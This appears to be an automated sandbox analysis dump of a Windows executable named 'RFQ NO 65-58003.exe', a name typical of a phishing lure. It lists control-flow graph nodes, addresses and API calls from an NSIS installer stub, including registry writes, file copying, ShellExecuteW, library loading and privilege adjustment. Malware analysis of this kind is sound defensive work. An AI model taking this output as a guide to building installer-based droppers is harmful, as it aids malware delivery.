4148 4019da lstrlenW 4147->4148 4148->4145 4149->4147 3331 403969 3332 403984 3331->3332 3333 40397a CloseHandle 3331->3333 3334 403998 3332->3334 3335 40398e CloseHandle 3332->3335 3333->3332 3340 4039c6 3334->3340 3335->3334 3338 405a03 69 API calls 3339 4039a9 3338->3339 3341 4039d4 3340->3341 3342 40399d 3341->3342 3343 4039d9 FreeLibrary GlobalFree 3341->3343 3342->3338 3343->3342 3343->3343 3641 4023ea 3642 4023f0 3641->3642 3643 402c53 18 API calls 3642->3643 3644 402402 3643->3644 3645 402c53 18 API calls 3644->3645 3646 40240c RegCreateKeyExW 3645->3646 3647 402436 3646->3647 3649 4028a1 3646->3649 3648 402451 3647->3648 3650 402c53 18 API calls 3647->3650 3651 40245d 3648->3651 3658 402c31 3648->3658 3653 402447 lstrlenW 3650->3653 3652 40247c RegSetValueExW 3651->3652 3655 40317b 45 API calls 3651->3655 3656 402492 RegCloseKey 3652->3656 3653->3648 3655->3652 3656->3649 3659 406234 18 API calls 3658->3659 3660 402c46 3659->3660 3660->3651 4150 40166a 4151 402c53 18 API calls 4150->4151 4152 401670 4151->4152 4153 406555 2 API calls 4152->4153 4154 401676 4153->4154 4155 4043ea lstrcpynW lstrlenW 4156 404ced GetDlgItem GetDlgItem 4157 404d3f 7 API calls 4156->4157 4161 404f58 4156->4161 4158 404de2 DeleteObject 4157->4158 4159 404dd5 SendMessageW 4157->4159 4160 404deb 4158->4160 4159->4158 4162 404e22 4160->4162 4164 406234 18 API calls 4160->4164 4175 404c3b 5 API calls 4161->4175 4179 40503c 4161->4179 4188 404fc9 4161->4188 4165 4042d6 19 API calls 4162->4165 4163 4050e8 4168 4050f2 SendMessageW 4163->4168 4169 4050fa 4163->4169 4170 404e04 SendMessageW SendMessageW 4164->4170 4166 404e36 4165->4166 4171 4042d6 19 API calls 4166->4171 4167 404f4b 4173 40433d 8 API calls 4167->4173 4168->4169 4180 405113 4169->4180 4181 40510c ImageList_Destroy 4169->4181 4185 405123 4169->4185 4170->4160 4189 404e44 4171->4189 4172 405095 SendMessageW 4172->4167 4177 4050aa SendMessageW 4172->4177 4178 4052de 4173->4178 4174 40502e SendMessageW 4174->4179 4175->4188 
4176 405292 4176->4167 4186 4052a4 ShowWindow GetDlgItem ShowWindow 4176->4186 4184 4050bd 4177->4184 4179->4163 4179->4167 4179->4172 4182 40511c GlobalFree 4180->4182 4180->4185 4181->4180 4182->4185 4183 404f19 GetWindowLongW SetWindowLongW 4187 404f32 4183->4187 4194 4050ce SendMessageW 4184->4194 4185->4176 4199 404cbb 4 API calls 4185->4199 4203 40515e 4185->4203 4186->4167 4190 404f50 4187->4190 4191 404f38 ShowWindow 4187->4191 4188->4174 4188->4179 4189->4183 4193 404e94 SendMessageW 4189->4193 4195 404f13 4189->4195 4197 404ed0 SendMessageW 4189->4197 4198 404ee1 SendMessageW 4189->4198 4208 40430b SendMessageW 4190->4208 4207 40430b SendMessageW 4191->4207 4193->4189 4194->4163 4195->4183 4195->4187 4197->4189 4198->4189 4199->4203 4200 405268 InvalidateRect 4200->4176 4201 40527e 4200->4201 4209 404bf6 4201->4209 4202 40518c SendMessageW 4206 4051a2 4202->4206 4203->4202 4203->4206 4205 405216 SendMessageW SendMessageW 4205->4206 4206->4200 4206->4205 4207->4167 4208->4161 4212 404b2d 4209->4212 4211 404c0b 4211->4176 4213 404b46 4212->4213 4214 406234 18 API calls 4213->4214 4215 404baa 4214->4215 4216 406234 18 API calls 4215->4216 4217 404bb5 4216->4217 4218 406234 18 API calls 4217->4218 4219 404bcb lstrlenW wsprintfW SetDlgItemTextW 4218->4219 4219->4211 4220 401ced 4221 402c31 18 API calls 4220->4221 4222 401cf3 IsWindow 4221->4222 4223 401a20 4222->4223 3698 40176f 3699 402c53 18 API calls 3698->3699 3700 401776 3699->3700 3701 401796 3700->3701 3702 40179e 3700->3702 3737 406212 lstrcpynW 3701->3737 3738 406212 lstrcpynW 3702->3738 3705 40179c 3709 4064a6 5 API calls 3705->3709 3706 4017a9 3707 405bc6 3 API calls 3706->3707 3708 4017af lstrcatW 3707->3708 3708->3705 3725 4017bb 3709->3725 3710 406555 2 API calls 3710->3725 3711 405dc2 2 API calls 3711->3725 3713 4017cd CompareFileTime 3713->3725 3714 40188d 3715 405371 25 API calls 3714->3715 3718 401897 3715->3718 3716 405371 25 API calls 3720 401879 3716->3720 3717 406212 lstrcpynW 3717->3725 
3719 40317b 45 API calls 3718->3719 3721 4018aa 3719->3721 3722 4018be SetFileTime 3721->3722 3723 4018d0 CloseHandle 3721->3723 3722->3723 3723->3720 3726 4018e1 3723->3726 3724 406234 18 API calls 3724->3725 3725->3710 3725->3711 3725->3713 3725->3714 3725->3717 3725->3724 3731 405957 MessageBoxIndirectW 3725->3731 3734 401864 3725->3734 3736 405de7 GetFileAttributesW CreateFileW 3725->3736 3727 4018e6 3726->3727 3728 4018f9 3726->3728 3729 406234 18 API calls 3727->3729 3730 406234 18 API calls 3728->3730 3732 4018ee lstrcatW 3729->3732 3733 401901 3730->3733 3731->3725 3732->3733 3735 405957 MessageBoxIndirectW 3733->3735 3734->3716 3734->3720 3735->3720 3736->3725 3737->3705 3738->3706 4224 404771 4225 40479d 4224->4225 4226 4047ae 4224->4226 4285 40593b GetDlgItemTextW 4225->4285 4227 4047ba GetDlgItem 4226->4227 4230 404819 4226->4230 4229 4047ce 4227->4229 4233 4047e2 SetWindowTextW 4229->4233 4236 405c71 4 API calls 4229->4236 4238 406234 18 API calls 4230->4238 4247 4048fd 4230->4247 4283 404aac 4230->4283 4231 4047a8 4232 4064a6 5 API calls 4231->4232 4232->4226 4237 4042d6 19 API calls 4233->4237 4235 40433d 8 API calls 4240 404ac0 4235->4240 4241 4047d8 4236->4241 4242 4047fe 4237->4242 4243 40488d SHBrowseForFolderW 4238->4243 4239 40492d 4244 405cce 18 API calls 4239->4244 4241->4233 4249 405bc6 3 API calls 4241->4249 4245 4042d6 19 API calls 4242->4245 4246 4048a5 CoTaskMemFree 4243->4246 4243->4247 4248 404933 4244->4248 4250 40480c 4245->4250 4251 405bc6 3 API calls 4246->4251 4247->4283 4287 40593b GetDlgItemTextW 4247->4287 4288 406212 lstrcpynW 4248->4288 4249->4233 4286 40430b SendMessageW 4250->4286 4253 4048b2 4251->4253 4257 4048e9 SetDlgItemTextW 4253->4257 4260 406234 18 API calls 4253->4260 4255 40494a 4259 4065ec 5 API calls 4255->4259 4256 404812 4258 4065ec 5 API calls 4256->4258 4257->4247 4258->4230 4266 404951 4259->4266 4261 4048d1 lstrcmpiW 4260->4261 4261->4257 4263 4048e2 lstrcatW 4261->4263 4262 404992 4289 406212 lstrcpynW 
4262->4289 4263->4257 4265 404999 4267 405c71 4 API calls 4265->4267 4266->4262 4271 405c12 2 API calls 4266->4271 4272 4049ea 4266->4272 4268 40499f GetDiskFreeSpaceW 4267->4268 4270 4049c3 MulDiv 4268->4270 4268->4272 4270->4272 4271->4266 4273 404a5b 4272->4273 4275 404bf6 21 API calls 4272->4275 4274 404a7e 4273->4274 4277 40140b 2 API calls 4273->4277 4290 4042f8 KiUserCallbackDispatcher 4274->4290 4276 404a48 4275->4276 4278 404a5d SetDlgItemTextW 4276->4278 4279 404a4d 4276->4279 4277->4274 4278->4273 4281 404b2d 21 API calls 4279->4281 4281->4273 4282 404a9a 4282->4283 4291 404706 4282->4291 4283->4235 4285->4231 4286->4256 4287->4239 4288->4255 4289->4265 4290->4282 4292 404714 4291->4292 4293 404719 SendMessageW 4291->4293 4292->4293 4293->4283 4294 401b71 4295 401bc2 4294->4295 4296 401b7e 4294->4296 4298 401bc7 4295->4298 4299 401bec GlobalAlloc 4295->4299 4297 4022e4 4296->4297 4303 401b95 4296->4303 4301 406234 18 API calls 4297->4301 4312 401c07 4298->4312 4315 406212 lstrcpynW 4298->4315 4300 406234 18 API calls 4299->4300 4300->4312 4305 4022f1 4301->4305 4313 406212 lstrcpynW 4303->4313 4304 401bd9 GlobalFree 4304->4312 4308 405957 MessageBoxIndirectW 4305->4308 4307 401ba4 4314 406212 lstrcpynW 4307->4314 4308->4312 4310 401bb3 4316 406212 lstrcpynW 4310->4316 4313->4307 4314->4310 4315->4304 4316->4312 4317 401a72 4318 402c31 18 API calls 4317->4318 4319 401a78 4318->4319 4320 402c31 18 API calls 4319->4320 4321 401a20 4320->4321 4322 404473 4323 40448b 4322->4323 4328 4045a5 4322->4328 4329 4042d6 19 API calls 4323->4329 4324 40460f 4325 4046e1 4324->4325 4326 404619 GetDlgItem 4324->4326 4330 40433d 8 API calls 4325->4330 4327 404633 4326->4327 4331 4046a2 4326->4331 4327->4331 4336 404659 6 API calls 4327->4336 4328->4324 4328->4325 4332 4045e0 GetDlgItem SendMessageW 4328->4332 4333 4044f2 4329->4333 4335 4046dc 4330->4335 4331->4325 4337 4046b4 4331->4337 4353 4042f8 KiUserCallbackDispatcher 4332->4353 4334 4042d6 19 API calls 4333->4334 
4339 4044ff CheckDlgButton 4334->4339 4336->4331 4340 4046ca 4337->4340 4341 4046ba SendMessageW 4337->4341 4351 4042f8 KiUserCallbackDispatcher 4339->4351 4340->4335 4344 4046d0 SendMessageW 4340->4344 4341->4340 4342 40460a 4345 404706 SendMessageW 4342->4345 4344->4335 4345->4324 4346 40451d GetDlgItem 4352 40430b SendMessageW 4346->4352 4348 404533 SendMessageW 4349 404550 GetSysColor 4348->4349 4350 404559 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4348->4350 4349->4350 4350->4335 4351->4346 4352->4348 4353->4342 4354 401573 4355 401583 ShowWindow 4354->4355 4356 40158c 4354->4356 4355->4356 4357 40159a ShowWindow 4356->4357 4358 402adb 4356->4358 4357->4358 4359 4014f5 SetForegroundWindow 4360 402adb 4359->4360 4361 401e77 4362 402c53 18 API calls 4361->4362 4363 401e7d 4362->4363 4364 402c53 18 API calls 4363->4364 4365 401e86 4364->4365 4366 402c53 18 API calls 4365->4366 4367 401e8f 4366->4367 4368 402c53 18 API calls 4367->4368 4369 401e98 4368->4369 4370 401423 25 API calls 4369->4370 4371 401e9f ShellExecuteW 4370->4371 4372 401ed0 4371->4372 4380 40167b 4381 402c53 18 API calls 4380->4381 4382 401682 4381->4382 4383 402c53 18 API calls 4382->4383 4384 40168b 4383->4384 4385 402c53 18 API calls 4384->4385 4386 401694 MoveFileW 4385->4386 4387 4016a0 4386->4387 4388 4016a7 4386->4388 4390 401423 25 API calls 4387->4390 4389 406555 2 API calls 4388->4389 4392 402250 4388->4392 4391 4016b6 4389->4391 4390->4392 4391->4392 4393 4060b3 38 API calls 4391->4393 4393->4387 3844 403dfe 3845 403f51 3844->3845 3846 403e16 3844->3846 3848 403f62 GetDlgItem GetDlgItem 3845->3848 3849 403fa2 3845->3849 3846->3845 3847 403e22 3846->3847 3850 403e40 3847->3850 3851 403e2d SetWindowPos 3847->3851 3852 4042d6 19 API calls 3848->3852 3853 403ffc 3849->3853 3858 401389 2 API calls 3849->3858 3855 403e45 ShowWindow 3850->3855 3856 403e5d 3850->3856 3851->3850 3857 403f8c SetClassLongW 3852->3857 3854 404322 SendMessageW 3853->3854 3874 403f4c 3853->3874 
3884 40400e 3854->3884 3855->3856 3859 403e65 DestroyWindow 3856->3859 3860 403e7f 3856->3860 3861 40140b 2 API calls 3857->3861 3862 403fd4 3858->3862 3913 40425f 3859->3913 3863 403e84 SetWindowLongW 3860->3863 3864 403e95 3860->3864 3861->3849 3862->3853 3865 403fd8 SendMessageW 3862->3865 3863->3874 3868 403ea1 GetDlgItem 3864->3868 3869 403f3e 3864->3869 3865->3874 3866 40140b 2 API calls 3866->3884 3867 404261 DestroyWindow KiUserCallbackDispatcher 3867->3913 3870 403ed1 3868->3870 3871 403eb4 SendMessageW IsWindowEnabled 3868->3871 3872 40433d 8 API calls 3869->3872 3876 403ede 3870->3876 3877 403f25 SendMessageW 3870->3877 3878 403ef1 3870->3878 3888 403ed6 3870->3888 3871->3870 3871->3874 3872->3874 3873 404290 ShowWindow 3873->3874 3875 406234 18 API calls 3875->3884 3876->3877 3876->3888 3877->3869 3881 403ef9 3878->3881 3882 403f0e 3878->3882 3879 4042af SendMessageW 3883 403f0c 3879->3883 3880 4042d6 19 API calls 3880->3884 3886 40140b 2 API calls 3881->3886 3885 40140b 2 API calls 3882->3885 3883->3869 3884->3866 3884->3867 3884->3874 3884->3875 3884->3880 3889 4042d6 19 API calls 3884->3889 3904 4041a1 DestroyWindow 3884->3904 3887 403f15 3885->3887 3886->3888 3887->3869 3887->3888 3888->3879 3890 404089 GetDlgItem 3889->3890 3891 4040a6 ShowWindow KiUserCallbackDispatcher 3890->3891 3892 40409e 3890->3892 3914 4042f8 KiUserCallbackDispatcher 3891->3914 3892->3891 3894 4040d0 EnableWindow 3897 4040e4 3894->3897 3895 4040e9 GetSystemMenu EnableMenuItem SendMessageW 3896 404119 SendMessageW 3895->3896 3895->3897 3896->3897 3897->3895 3915 40430b SendMessageW 3897->3915 3916 406212 lstrcpynW 3897->3916 3900 404147 lstrlenW 3901 406234 18 API calls 3900->3901 3902 40415d SetWindowTextW 3901->3902 3903 401389 2 API calls 3902->3903 3903->3884 3905 4041bb CreateDialogParamW 3904->3905 3904->3913 3906 4041ee 3905->3906 3905->3913 3907 4042d6 19 API calls 3906->3907 3908 4041f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3907->3908 3909 401389 2 API 
calls 3908->3909 3910 40423f 3909->3910 3910->3874 3911 404247 ShowWindow 3910->3911 3912 404322 SendMessageW 3911->3912 3912->3913 3913->3873 3913->3874 3914->3894 3915->3897 3916->3900 3917 40287e 3918 402c53 18 API calls 3917->3918 3919 402885 FindFirstFileW 3918->3919 3920 402898 3919->3920 3921 4028ad 3919->3921 3922 4028b6 3921->3922 3925 406159 wsprintfW 3921->3925 3926 406212 lstrcpynW 3922->3926 3925->3922 3926->3920 4394 4019ff 4395 402c53 18 API calls 4394->4395 4396 401a06 4395->4396 4397 402c53 18 API calls 4396->4397 4398 401a0f 4397->4398 4399 401a16 lstrcmpiW 4398->4399 4400 401a28 lstrcmpW 4398->4400 4401 401a1c 4399->4401 4400->4401 4402 401000 4403 401037 BeginPaint GetClientRect 4402->4403 4404 40100c DefWindowProcW 4402->4404 4406 4010f3 4403->4406 4407 401179 4404->4407 4408 401073 CreateBrushIndirect FillRect DeleteObject 4406->4408 4409 4010fc 4406->4409 4408->4406 4410 401102 CreateFontIndirectW 4409->4410 4411 401167 EndPaint 4409->4411 4410->4411 4412 401112 6 API calls 4410->4412 4411->4407 4412->4411 4413 401503 4414 40150b 4413->4414 4416 40151e 4413->4416 4415 402c31 18 API calls 4414->4415 4415->4416 4417 402104 4418 402c53 18 API calls 4417->4418 4419 40210b 4418->4419 4420 402c53 18 API calls 4419->4420 4421 402115 4420->4421 4422 402c53 18 API calls 4421->4422 4423 40211f 4422->4423 4424 402c53 18 API calls 4423->4424 4425 402129 4424->4425 4426 402c53 18 API calls 4425->4426 4428 402133 4426->4428 4427 402172 CoCreateInstance 4432 402191 4427->4432 4428->4427 4429 402c53 18 API calls 4428->4429 4429->4427 4430 401423 25 API calls 4431 402250 4430->4431 4432->4430 4432->4431 4433 402805 4434 40280c 4433->4434 4436 402a86 4433->4436 4435 402c31 18 API calls 4434->4435 4437 402813 4435->4437 4438 402822 SetFilePointer 4437->4438 4438->4436 4439 402832 4438->4439 4441 406159 wsprintfW 4439->4441 4441->4436 3661 40230c 3662 402314 3661->3662 3665 40231a 3661->3665 3663 402c53 18 API calls 3662->3663 3663->3665 3664 402c53 18 API calls 
3666 402328 3664->3666 3665->3664 3665->3666 3667 402c53 18 API calls 3666->3667 3669 402336 3666->3669 3667->3669 3668 402c53 18 API calls 3670 40233f WritePrivateProfileStringW 3668->3670 3669->3668 4442 40190c 4443 401943 4442->4443 4444 402c53 18 API calls 4443->4444 4445 401948 4444->4445 4446 405a03 69 API calls 4445->4446 4447 401951 4446->4447 4448 401f8c 4449 402c53 18 API calls 4448->4449 4450 401f93 4449->4450 4451 4065ec 5 API calls 4450->4451 4452 401fa2 4451->4452 4453 401fbe GlobalAlloc 4452->4453 4456 402026 4452->4456 4454 401fd2 4453->4454 4453->4456 4455 4065ec 5 API calls 4454->4455 4457 401fd9 4455->4457 4458 4065ec 5 API calls 4457->4458 4459 401fe3 4458->4459 4459->4456 4463 406159 wsprintfW 4459->4463 4461 402018 4464 406159 wsprintfW 4461->4464 4463->4461 4464->4456 4465 40258c 4466 402c53 18 API calls 4465->4466 4467 402593 4466->4467 4470 405de7 GetFileAttributesW CreateFileW 4467->4470 4469 40259f 4470->4469 3671 40238e 3672 402393 3671->3672 3673 4023be 3671->3673 3684 402d5d 3672->3684 3675 402c53 18 API calls 3673->3675 3678 4023c5 3675->3678 3676 40239a 3677 4023a4 3676->3677 3679 4023dd 3676->3679 3680 402c53 18 API calls 3677->3680 3688 402c93 RegOpenKeyExW 3678->3688 3682 4023ab RegDeleteValueW RegCloseKey 3680->3682 3682->3679 3685 402c53 18 API calls 3684->3685 3686 402d76 3685->3686 3687 402d84 RegOpenKeyExW 3686->3687 3687->3676 3692 402cbe 3688->3692 3697 4023db 3688->3697 3689 402ce4 RegEnumKeyW 3690 402cf6 RegCloseKey 3689->3690 3689->3692 3691 4065ec 5 API calls 3690->3691 3694 402d06 3691->3694 3692->3689 3692->3690 3693 402d1b RegCloseKey 3692->3693 3695 402c93 5 API calls 3692->3695 3693->3697 3696 402d36 RegDeleteKeyW 3694->3696 3694->3697 3695->3692 3696->3697 3697->3679 4471 401d0e 4472 402c31 18 API calls 4471->4472 4473 401d15 4472->4473 4474 402c31 18 API calls 4473->4474 4475 401d21 GetDlgItem 4474->4475 4476 4025a8 4475->4476 4477 40190f 4478 402c53 18 API calls 4477->4478 4479 401916 4478->4479 4480 405957 
MessageBoxIndirectW 4479->4480 4481 40191f 4480->4481 3808 402511 3809 402d5d 19 API calls 3808->3809 3810 40251b 3809->3810 3811 402c31 18 API calls 3810->3811 3812 402524 3811->3812 3813 402533 3812->3813 3817 4028a1 3812->3817 3814 402540 RegEnumKeyW 3813->3814 3815 40254c RegEnumValueW 3813->3815 3816 402565 RegCloseKey 3814->3816 3815->3816 3815->3817 3816->3817 4496 401491 4497 405371 25 API calls 4496->4497 4498 401498 4497->4498 4506 402d98 4507 402daa SetTimer 4506->4507 4509 402dc3 4506->4509 4507->4509 4508 402e11 4509->4508 4510 402e17 MulDiv 4509->4510 4511 402dd1 wsprintfW SetWindowTextW SetDlgItemTextW 4510->4511 4511->4508 4513 401c19 4514 402c31 18 API calls 4513->4514 4515 401c20 4514->4515 4516 402c31 18 API calls 4515->4516 4517 401c2d 4516->4517 4518 402c53 18 API calls 4517->4518 4519 401c42 4517->4519 4518->4519 4520 402c53 18 API calls 4519->4520 4525 401c52 4519->4525 4520->4525 4521 401ca9 4524 402c53 18 API calls 4521->4524 4522 401c5d 4523 402c31 18 API calls 4522->4523 4526 401c62 4523->4526 4527 401cae 4524->4527 4525->4521 4525->4522 4528 402c31 18 API calls 4526->4528 4529 402c53 18 API calls 4527->4529 4530 401c6e 4528->4530 4531 401cb7 FindWindowExW 4529->4531 4532 401c99 SendMessageW 4530->4532 4533 401c7b SendMessageTimeoutW 4530->4533 4534 401cd9 4531->4534 4532->4534 4533->4534 4535 403a19 4536 403a24 4535->4536 4537 403a28 4536->4537 4538 403a2b GlobalAlloc 4536->4538 4538->4537 4539 40249d 4540 402d5d 19 API calls 4539->4540 4541 4024a7 4540->4541 4542 402c53 18 API calls 4541->4542 4543 4024b0 4542->4543 4544 4028a1 4543->4544 4545 4024bb RegQueryValueExW 4543->4545 4546 4024db 4545->4546 4549 4024e1 RegCloseKey 4545->4549 4546->4549 4550 406159 wsprintfW 4546->4550 4549->4544 4550->4549 4551 40149e 4552 4022f7 4551->4552 4553 4014ac PostQuitMessage 4551->4553 4553->4552 4554 4015a3 4555 402c53 18 API calls 4554->4555 4556 4015aa SetFileAttributesW 4555->4556 4557 4015bc 4556->4557 4558 404424 lstrlenW 4559 404443 4558->4559 
4560 404445 WideCharToMultiByte 4558->4560 4559->4560 4568 40472a 4569 404760 4568->4569 4570 40473a 4568->4570 4572 40433d 8 API calls 4569->4572 4571 4042d6 19 API calls 4570->4571 4573 404747 SetDlgItemTextW 4571->4573 4574 40476c 4572->4574 4573->4569 4575 4025ae 4576 4025c2 4575->4576 4577 4025dd 4575->4577 4580 402c31 18 API calls 4576->4580 4578 402611 4577->4578 4579 4025e2 4577->4579 4582 402c53 18 API calls 4578->4582 4581 402c53 18 API calls 4579->4581 4585 4025c9 4580->4585 4583 4025e9 WideCharToMultiByte lstrlenA 4581->4583 4584 402618 lstrlenW 4582->4584 4583->4585 4584->4585 4586 40265b 4585->4586 4587 402645 4585->4587 4589 405ec8 5 API calls 4585->4589 4587->4586 4588 405e99 WriteFile 4587->4588 4588->4586 4589->4587 3739 4054b0 3740 4054d1 GetDlgItem GetDlgItem GetDlgItem 3739->3740 3741 40565a 3739->3741 3784 40430b SendMessageW 3740->3784 3743 405663 GetDlgItem CreateThread CloseHandle 3741->3743 3744 40568b 3741->3744 3743->3744 3807 405444 5 API calls 3743->3807 3746 4056b6 3744->3746 3747 4056a2 ShowWindow ShowWindow 3744->3747 3748 4056db 3744->3748 3745 405541 3752 405548 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3745->3752 3749 4056f0 ShowWindow 3746->3749 3750 4056ca 3746->3750 3753 405716 3746->3753 3789 40430b SendMessageW 3747->3789 3793 40433d 3748->3793 3757 405710 3749->3757 3758 405702 3749->3758 3790 4042af 3750->3790 3759 4055b6 3752->3759 3760 40559a SendMessageW SendMessageW 3752->3760 3753->3748 3761 405724 SendMessageW 3753->3761 3756 4056e9 3763 4042af SendMessageW 3757->3763 3762 405371 25 API calls 3758->3762 3764 4055c9 3759->3764 3765 4055bb SendMessageW 3759->3765 3760->3759 3761->3756 3766 40573d CreatePopupMenu 3761->3766 3762->3757 3763->3753 3785 4042d6 3764->3785 3765->3764 3768 406234 18 API calls 3766->3768 3769 40574d AppendMenuW 3768->3769 3771 40576a GetWindowRect 3769->3771 3772 40577d TrackPopupMenu 3769->3772 3770 4055d9 3773 4055e2 ShowWindow 3770->3773 3774 405616 GetDlgItem SendMessageW 
3770->3774 3771->3772 3772->3756 3775 405798 3772->3775 3776 4055f8 ShowWindow 3773->3776 3779 405605 3773->3779 3774->3756 3777 40563d SendMessageW SendMessageW 3774->3777 3778 4057b4 SendMessageW 3775->3778 3776->3779 3777->3756 3778->3778 3780 4057d1 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3778->3780 3788 40430b SendMessageW 3779->3788 3782 4057f6 SendMessageW 3780->3782 3782->3782 3783 40581f GlobalUnlock SetClipboardData CloseClipboard 3782->3783 3783->3756 3784->3745 3786 406234 18 API calls 3785->3786 3787 4042e1 SetDlgItemTextW 3786->3787 3787->3770 3788->3774 3789->3746 3791 4042b6 3790->3791 3792 4042bc SendMessageW 3790->3792 3791->3792 3792->3748 3794 404355 GetWindowLongW 3793->3794 3804 4043de 3793->3804 3795 404366 3794->3795 3794->3804 3796 404375 GetSysColor 3795->3796 3797 404378 3795->3797 3796->3797 3798 404388 SetBkMode 3797->3798 3799 40437e SetTextColor 3797->3799 3800 4043a0 GetSysColor 3798->3800 3801 4043a6 3798->3801 3799->3798 3800->3801 3802 4043b7 3801->3802 3803 4043ad SetBkColor 3801->3803 3802->3804 3805 4043d1 CreateBrushIndirect 3802->3805 3806 4043ca DeleteObject 3802->3806 3803->3802 3804->3756 3805->3804 3806->3805 4590 401a30 4591 402c53 18 API calls 4590->4591 4592 401a39 ExpandEnvironmentStringsW 4591->4592 4593 401a4d 4592->4593 4595 401a60 4592->4595 4594 401a52 lstrcmpW 4593->4594 4593->4595 4594->4595 4601 402032 4602 402044 4601->4602 4603 4020f6 4601->4603 4604 402c53 18 API calls 4602->4604 4606 401423 25 API calls 4603->4606 4605 40204b 4604->4605 4607 402c53 18 API calls 4605->4607 4611 402250 4606->4611 4608 402054 4607->4608 4609 40206a LoadLibraryExW 4608->4609 4610 40205c GetModuleHandleW 4608->4610 4609->4603 4612 40207b 4609->4612 4610->4609 4610->4612 4621 40665b WideCharToMultiByte 4612->4621 4615 4020c5 4617 405371 25 API calls 4615->4617 4616 40208c 4618 401423 25 API calls 4616->4618 4619 40209c 4616->4619 4617->4619 4618->4619 4619->4611 4620 4020e8 FreeLibrary 4619->4620 4620->4611 4622 
406685 GetProcAddress 4621->4622 4623 402086 4621->4623 4622->4623 4623->4615 4623->4616 4624 401d33 4625 402c31 18 API calls 4624->4625 4626 401d44 SetWindowLongW 4625->4626 4627 402adb 4626->4627 4628 401db3 GetDC 4629 402c31 18 API calls 4628->4629 4630 401dc5 GetDeviceCaps MulDiv ReleaseDC 4629->4630 4631 402c31 18 API calls 4630->4631 4632 401df6 4631->4632 4633 406234 18 API calls 4632->4633 4634 401e33 CreateFontIndirectW 4633->4634 4635 4025a8 4634->4635 4636 401735 4637 402c53 18 API calls 4636->4637 4638 40173c SearchPathW 4637->4638 4639 401757 4638->4639 4640 402ab6 SendMessageW 4641 402ad0 InvalidateRect 4640->4641 4642 402adb 4640->4642 4641->4642 4643 402837 4644 40283d 4643->4644 4645 402845 FindClose 4644->4645 4646 402adb 4644->4646 4645->4646 4647 4014b8 4648 4014be 4647->4648 4649 401389 2 API calls 4648->4649 4650 4014c6 4649->4650 4651 4029be 4652 402c31 18 API calls 4651->4652 4653 4029c4 4652->4653 4654 402a04 4653->4654 4655 4029eb 4653->4655 4663 4028a1 4653->4663 4656 402a1e 4654->4656 4657 402a0e 4654->4657 4658 4029f0 4655->4658 4664 402a01 4655->4664 4660 406234 18 API calls 4656->4660 4659 402c31 18 API calls 4657->4659 4665 406212 lstrcpynW 4658->4665 4659->4664 4660->4664 4664->4663 4666 406159 wsprintfW 4664->4666 4665->4663 4666->4663

                                                              Control-flow Graph

                                                              control_flow_graph 0 40344a-40347d SetErrorMode GetVersion 1 403490 0->1 2 40347f-403487 call 4065ec 0->2 3 403495-4034a9 call 40657c lstrlenA 1->3 2->1 7 403489 2->7 9 4034ab-40351f call 4065ec * 2 #17 OleInitialize SHGetFileInfoW call 406212 GetCommandLineW call 406212 GetModuleHandleW 3->9 7->1 18 403521-403528 9->18 19 403529-403543 call 405bf3 CharNextW 9->19 18->19 22 403549-40354f 19->22 23 40365a-403674 GetTempPathW call 403419 19->23 24 403551-403556 22->24 25 403558-40355c 22->25 30 403676-403694 GetWindowsDirectoryW lstrcatW call 403419 23->30 31 4036cc-4036e6 DeleteFileW call 402ed5 23->31 24->24 24->25 27 403563-403567 25->27 28 40355e-403562 25->28 32 403626-403633 call 405bf3 27->32 33 40356d-403573 27->33 28->27 30->31 46 403696-4036c6 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403419 30->46 50 403797-4037a7 ExitProcess CoUninitialize 31->50 51 4036ec-4036f2 31->51 48 403635-403636 32->48 49 403637-40363d 32->49 37 403575-40357d 33->37 38 40358e-4035c7 33->38 42 403584 37->42 43 40357f-403582 37->43 44 4035e4-40361e 38->44 45 4035c9-4035ce 38->45 42->38 43->38 43->42 44->32 47 403620-403624 44->47 45->44 52 4035d0-4035d8 45->52 46->31 46->50 47->32 56 403645-403653 call 406212 47->56 48->49 49->22 57 403643 49->57 60 4038cd-4038d3 50->60 61 4037ad-4037bd call 405957 ExitProcess 50->61 58 403787-40378e call 403a5b 51->58 59 4036f8-403703 call 405bf3 51->59 53 4035da-4035dd 52->53 54 4035df 52->54 53->44 53->54 54->44 66 403658 56->66 57->66 76 403793 58->76 78 403751-40375b 59->78 79 403705-40373a 59->79 63 403951-403959 60->63 64 4038d5-4038eb GetCurrentProcess OpenProcessToken 60->64 70 40395b 63->70 71 40395f-403963 ExitProcess 63->71 73 403921-40392f call 4065ec 64->73 74 4038ed-40391b LookupPrivilegeValueW AdjustTokenPrivileges 64->74 66->23 70->71 86 403931-40393b 73->86 87 40393d-403948 ExitWindowsEx 73->87 74->73 76->50 80 4037c3-4037d7 call 4058da lstrcatW 78->80 81 
40375d-40376b call 405cce 78->81 83 40373c-403740 79->83 94 4037e4-4037fe lstrcatW lstrcmpiW 80->94 95 4037d9-4037df lstrcatW 80->95 81->50 96 40376d-403783 call 406212 * 2 81->96 88 403742-403747 83->88 89 403749-40374d 83->89 86->87 93 40394a-40394c call 40140b 86->93 87->63 87->93 88->89 90 40374f 88->90 89->83 89->90 90->78 93->63 94->50 99 403800-403803 94->99 95->94 96->58 101 403805-40380a call 405840 99->101 102 40380c call 4058bd 99->102 109 403811-40381f SetCurrentDirectoryW 101->109 102->109 110 403821-403827 call 406212 109->110 111 40382c-403855 call 406212 109->111 110->111 115 40385a-403876 call 406234 DeleteFileW 111->115 118 4038b7-4038bf 115->118 119 403878-403888 CopyFileW 115->119 118->115 120 4038c1-4038c8 call 4060b3 118->120 119->118 121 40388a-4038aa call 4060b3 call 406234 call 4058f2 119->121 120->50 121->118 130 4038ac-4038b3 CloseHandle 121->130 130->118
                                                              APIs
                                                              • SetErrorMode.KERNELBASE ref: 0040346D
                                                              • GetVersion.KERNEL32 ref: 00403473
                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040349C
                                                              • #17.COMCTL32(00000007,00000009), ref: 004034BF
                                                              • OleInitialize.OLE32(00000000), ref: 004034C6
                                                              • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 004034E2
                                                              • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 004034F7
                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00000000), ref: 0040350A
